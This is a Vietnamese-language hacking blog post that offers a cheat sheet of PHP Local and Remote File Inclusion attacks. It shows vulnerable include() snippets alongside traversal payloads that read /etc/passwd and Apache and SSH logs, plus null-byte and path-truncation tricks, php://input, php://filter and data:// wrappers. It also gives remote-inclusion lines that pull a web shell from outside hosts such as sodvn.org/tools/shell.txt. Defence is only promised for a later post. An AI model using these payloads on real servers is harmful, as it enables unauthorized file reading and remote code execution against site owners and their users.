Thấy có người thắc mắc về vụ File inclusion này,mình sẽ lập 1 topic để giải đáp mọi vấn đề
Local File Inclusion Basic Level:
ví dụ trong trường hợp code như sau
Code:Chúng ta sẽ có thể :<?php include("includes/" . $_GET['file']); ?>
Including files cùng thư mục:Local File Inclusion Nâng cao:?file=.htaccess
Xem Path:
?file=../../../../../../../../../var/lib/locate.db
(this file is very interesting because it lets you search the filesystem, other files)
Including injected PHP code: có thể vào error.log,ssh auth.log,session file,...
?file=../../../../../../../../../var/log/apache/error.log
ví dụ đoạn code thế này
Code:CHúng ta sẽ dùng<?php include("includes/" . $_GET['file'] . ".htm"); ?>
Null Byte Injection:(yêu cầu magic_quotes_gpc=off)?file=../../../../../../../../../etc/passwd
Xem thư mục với Null Byte Injection:(UFS filesystem,magic_quotes_gpc=off)?file=../../../../../../../../../var/www/accounts/
Path Truncation:Xem thêm cái path truncation tại?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
http://www.ush.it/2009/02/08/php-fil...ttack-vectors/
Dot Truncation:(Windows)?file=../../../../../../../../../etc/passwd……………. …
Reverse Path Truncation:Giờ tiến hành nói đến Remote File Inclusion Cơ bản?file=../../../../ [...] ../../../../../etc/passwd
Ví dụ
Code:chúng ta có thể :<?php include($_GET['file']); ?>
Including Remote Code:(requires allow_url_fopen=On ,allow_url_include=On)?file=http://sodvn.org/tools/shell.txt (https hoặc ftp)
Sử dụng PHP stream php://input:(chỉ dùng cho POST parameters, allow_url_include=On)?file=php://input
Using PHP stream php://filter:(cái này k cần bật magic_quote vẫn ok)?file=php://filter/convert.base64-encode/resource=hehe.php
Sử dụng data URIs:(requires allow_url_include=On)?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
Sử dụng XSS: (cái này hay)(tuy nhiên bị hạn chế bở firewall)?file=http://127.0.0.1/path/xss.php?xss=phpcode
Remote File Inclusion thể loại khác:
ví dụ :
Code:thì<?php include($_GET['file'] . ".htm"); ?>1 số tài liệu tham khảo thêm?file=http://test.com/shell
?file=http://test.com/shell.txt?
?file=http://test.com/shell.txt%23 (allow_url_fopen=On, allow_url_include=On)'
The POST DATA method
http://blog.php-security.org/archive...l_include.html
PHP Protocol Wrappers documentation
http://www.php.net/manual/en/wrappers.php.php
PHP Filter documentation
http://www.php.net/manual/en/filters.convert.php
added code exec via ssh auth.log http://www.coresec.org/2011/05/12/lo...Assistance.pdf
Bài kế tiếp sẽ nói cách bảo vệ
Subscribe to:
Post Comments (Atom)
Post Labels
- .htaccess
- 0-day
- Add-on
- AutoIT
- BackConnect
- BackDoor
- BackTrack
- Blogger
- Blogger Template
- Botnet
- Brute
- Bypass
- CEH
- CGI
- Checked
- Chrome
- Code
- Code RIP
- cPanel
- Crack
- CSRF
- CSS
- DDoS
- Decode
- DNS
- dork
- Drupal
- Ebook
- ebook hacking
- Encryption
- Exploit
- FireFox
- Flood
- Get Root
- GHDB
- Gmail
- Hacker
- hacker os
- Hacking and Security
- Hacking Tools
- HTML
- HTML5
- Infographic
- Internet Explorer
- IT News
- J2TeaM
- J2TeaM Tools
- Java
- JavaScript
- Javascript Injection
- Joomla
- keylog
- Lab Hack
- Linux
- Local Attack
- Local File Include
- Malware
- Metasploit
- Microsoft
- MyBB
- MySQL
- Network
- newbie
- newbie area vhb
- Oracle
- Password
- Path Disclosure
- Pen-Test
- Perl
- Phishing
- PHP
- Plugin
- Programming
- Python
- Remote Code Execution
- Remote Desktop
- Remote File Include
- Reverse
- Scanner
- Security
- SEO
- Shell
- Social Engineering
- Software
- SQL Injection
- Symlink
- Tản mạn
- thiet ke web
- Thủ Thuật
- Thủ thuật blog
- Tips
- Tools
- Tricks
- TUTORIALS
- Upload
- vBulletin
- vhb
- Vietnamese ebook
- Virus
- Vulnerability
- Web Developer
- WHMCS
- WiFi
- Windows
- WordPress
- Write-up
- XSS
- Yahoo
- Youtube
Post a Comment